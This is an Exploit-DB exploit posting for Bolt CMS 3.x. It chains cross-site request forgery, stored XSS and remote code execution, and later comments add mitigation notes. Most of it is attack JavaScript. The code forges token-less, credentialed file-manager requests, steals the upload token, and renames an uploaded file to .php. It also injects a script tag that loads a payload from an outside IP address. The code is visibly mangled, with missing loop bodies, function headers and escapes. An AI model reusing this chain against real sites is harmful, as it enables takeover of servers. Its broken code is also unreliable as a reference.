Bolt CMS 3.6.10 – Cross-Site Request Forgery
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : N/A
# last version
# Csrf p0c
Bolt v 3.x exploit 0day
Bolt v 3.x csrf -> xss -> rce exploit
// First published PoC (Bolt 3.x): three chained form-encoded POSTs to the
// /async/ file-manager routes. As extracted here the code is mangled — the
// "for (var i = 0; i {" line has lost the rest of the loop, the xhr.send()
// call and the onreadystatechange header — so it does not run as written.
// Security-relevant point: every request is sent with withCredentials = true
// and a body that carries no anti-CSRF token, which is what lets a page the
// victim is lured to issue them under the victim's Bolt session.
// Mitigation: require a CSRF token on each state-changing /async/ route (the
// /bolt/files upload form already carries a file_upload[_token] field, as the
// Token() helper further down shows), set SameSite on the session cookie, and
// reject '<', '>' and path separators in file/folder names server-side.
// Detection: POST requests to /async/file/rename whose newname decodes to markup.
// Csrf, JSfuck1 and where are assigned without declaration (implicit globals).
function submitRequest()
{
// Step 1: create folder "sss" in the "files" namespace, then continue with JSfuck1().
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://127.0.0.1/index.php/async/folder/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
// Session cookies are attached: this is what turns the POST into a CSRF.
xhr.withCredentials = true;
// No token field in the body.
var body = "parent=&foldername=sss&namespace=files";
// Mangled from here to the closing brace of Csrf: the byte-copy loop, the
// send() call and the readystatechange handler header are missing; only the
// handler's body survived (status check, then JSfuck1()).
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
if (xhr.readyState === 4 && xhr.status === 200){
};
JSfuck1();
}
}
// Step 2: create file "aaa" inside the folder from step 1, then continue with where().
JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
// Handler is attached after send() and its body is empty; where() below runs
// immediately, without waiting for this response.
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
}
};
where();
}
// Step 3: rename "aaa" to a name whose URL-encoded value is a <script src=…>
// tag followed by ".jpg". A check that only looks at the trailing extension
// would accept it; if the name is later rendered unescaped this is the
// stored-XSS stage the header's "csrf -> xss" refers to. Server-side fix:
// validate the decoded name against a strict allow-list and HTML-encode
// names wherever they are displayed.
where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);
}
// Start the chain.
Csrf();
}
JS p0c
// "JS p0c" stage 1: GET the file-manager page as a parsed document, scrape the
// hidden file_upload[_token] input and hand it to upload(). Reading the
// response DOM requires the script to run same-origin with the Bolt session —
// the relative URL and withCredentials suggest this is the stage executed by
// the injected script (confirm). Point for defenders: a CSRF token that any
// script in the origin can read is no protection once stored XSS exists, so
// the XSS and the file-name validation are the bugs to fix, not the token.
// `doc` and `token` are assigned without declaration (implicit globals).
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/index.php/bolt/files", true);
// "document" so the response can be queried with DOM methods below.
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
// upload() is called before the token is logged.
upload(token);
console.log(token);
}
};
xhr.send();
}
// Stage 2: submit the file_upload form as a hand-built multipart/form-data
// body using the scraped token. As extracted, the body literal is broken:
// "rn" was "\r\n", the inner quote escapes are gone, and `token` on the line
// before the closing boundary is not joined with "+". The parameter is named
// csrfToken but the body reads the implicit global `token` set in Token().
// On HTTP 200 the handler calls Shell(). The "for (var i = 0; i {" line near
// the end has swallowed the rest of the loop, the send() call and the
// "Shell = async () => {" header, so everything after it is Shell's body.
// Shell renames the uploaded r3m0t3nu11.txt to a newname containing
// URL-encoded "/" separators and ".php" segments, then calls bypass().
// Defensive takeaway: decode, normalise and validate the full target path and
// its final extension on the server, and reject path separators in a "name".
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
"Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
"Content-Type: text/plainrn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[upload]"rn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[_token]"rn" +
"rn" +
token
"-----------------------------190530466613268610451083392867--rn";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
// Mangled: Shell's definition header is missing; the lines that follow are Shell's body.
for (var i = 0; i {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
// newname carries encoded slashes and ".php" components; a rename handler
// that only inspects the last extension of the raw string would accept it.
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
// bypass() runs without waiting for this response.
bypass();
}
// Stage 4: through /async/folder/rename, rename "aaa.jpg" under the nested
// "...php-exif-system.php/" parent to "bypass.php". Using the folder-rename
// route on a file suggests that route does not apply the extension check the
// file route does — TODO confirm against the handler. Server-side fix: apply
// identical name/extension validation on both rename routes and on the
// resulting on-disk path. bypass2() is called without waiting for the response.
bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
// parent mixes "%2F" and a literal "/"; validation must decode before checking.
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}
// Stage 5: rename the "php-exif-system.php" folder to "bypass1". Its purpose
// is not stated on the page (presumably to leave the renamed file under a
// plain directory name — confirm). Same credentialed, token-less POST pattern
// as every other /async/ call above.
bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);
}
// Entry point of the "JS p0c": Token() -> upload() -> Shell() -> bypass() -> bypass2().
Token();
version 6.5
CSRF p0c
Bolt v 3.x CVE-2019-17591 exploit
Bolt v 3.x csrf -> xss -> rce exploit
// Second published PoC, against a Bolt demo host: create file "test", then
// rename it. Same defect class as the first PoC — credentialed POSTs to the
// /async/ routes with no CSRF token in the body — and mangled by extraction
// in the same way (the "for (var i = 0; i {" line has lost the loop tail,
// the send() call and the handler header). The newname value in JSfuck() is
// empty here; the published payload appears to have been stripped along with
// other angle-bracket content (compare the rename step of the first PoC).
// Csrf and JSfuck are assigned without declaration (implicit globals).
function submitRequest()
{
// Step 1: create file "test" in the "files" namespace; on HTTP 200 call JSfuck().
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "filename=test&parentPath=&namespace=files";
// Mangled from here: only the readystatechange handler body survived.
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
if (xhr.readyState === 4 && xhr.status === 200){
JSfuck();
}
};
}
// Step 2: rename "test"; the newname is empty as extracted.
JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=";
xhr.send(body1);
}
// Start the chain.
Csrf();
}
JS p0c
// Same token-scraping stage as the first Token() helper, against the
// /bolt/files route layout (no index.php prefix). Reads the hidden
// file_upload[_token] from the fetched document and hands it to upload();
// this only works for a script running same-origin with the victim session,
// i.e. presumably the XSS stage (confirm). `doc` and `token` are implicit globals.
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/bolt/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
}
xhr.send(null);
}
// Upload stage of the second PoC: same hand-built multipart body and the
// same extraction damage as the first upload() ("rn" for "\r\n", lost quote
// escapes, `token` not joined with "+"), and the parameter csrfToken is again
// unused in favour of the implicit global `token`. After the
// "for (var i = 0; i {" line the "Shell = async () => {" header is missing,
// so the remaining lines are Shell's body: a single /async/file/rename that
// turns r3m0t3nu11.txt into "b.php" with parent "%2f". Per this PoC the
// rename route accepted an executable extension; the server should reject
// executable extensions in the files namespace on every route that can set
// a name, not only on upload.
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
"Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
"Content-Type: text/plainrn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[upload]"rn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[_token]"rn" +
"rn" +
token
"-----------------------------190530466613268610451083392867--rn";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
// Mangled: Shell's definition header is missing; the lines that follow are Shell's body.
for (var i = 0; i {
const xhr = new XMLHttpRequest();
// Note the doubled slash in the URL as published.
xhr.open("POST", "http://127.0.0.1//async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
// Entry point of the second "JS p0c": Token() -> upload() -> Shell().
Token();
Proof of concept:
https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends
https://www.exploit-db.com/exploits/47501